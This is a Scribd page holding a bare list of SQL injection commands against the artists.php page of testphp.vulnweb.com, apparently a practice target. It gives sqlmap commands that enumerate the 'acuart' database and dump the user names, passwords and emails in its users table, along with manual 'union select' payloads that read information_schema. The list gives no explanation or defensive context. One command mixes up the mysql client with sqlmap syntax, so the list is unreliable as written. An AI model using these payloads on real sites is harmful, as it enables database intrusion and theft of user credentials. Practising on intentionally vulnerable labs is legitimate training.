Scribd
Upload
47 views

SQL Injection

The document contains commands used to exploit an SQL injection vulnerability on the website http://testphp.vulnweb.com/artists.php. It uses sqlmap and MySQL commands to find database information, like database names, table names, column names, and eventually dump usernames, passwords, and emails from a users table to extract sensitive data from the vulnerable site.

Uploaded by

RituRajPS Unofficial (Raj Singh)
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
47 views

SQL Injection

The document contains commands used to exploit an SQL injection vulnerability on the website http://testphp.vulnweb.com/artists.php. It uses sqlmap and MySQL commands to find database information, like database names, table names, column names, and eventually dump usernames, passwords, and emails from a users table to extract sensitive data from the vulnerable site.

Uploaded by

RituRajPS Unofficial (Raj Singh)
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

http://testphp.vulnweb.com/artists.php?

artist=-1
http://testphp.vulnweb.com/artists.php?artist=1'
http://testphp.vulnweb.com/artists.php?artist=-1'

mysql -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --


columns

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C


uname --dump
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C
pass --dump
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C
email --dump

http://testphp.vulnweb.com/artists.php?artist=1 order by 3--

http://testphp.vulnweb.com/artists.php?artist=1 union select


1,2,group_concat(table_name) from information_schema.tables where
table_schema=database()--

http://testphp.vulnweb.com/artists.php?artist=1 union select


1,2,group_concat(column_name) from information_schema.columns where
table_name="users"--

http://testphp.vulnweb.com/artists.php?artist=1 union select


1,2,group_concat(uname) from users--

You might also like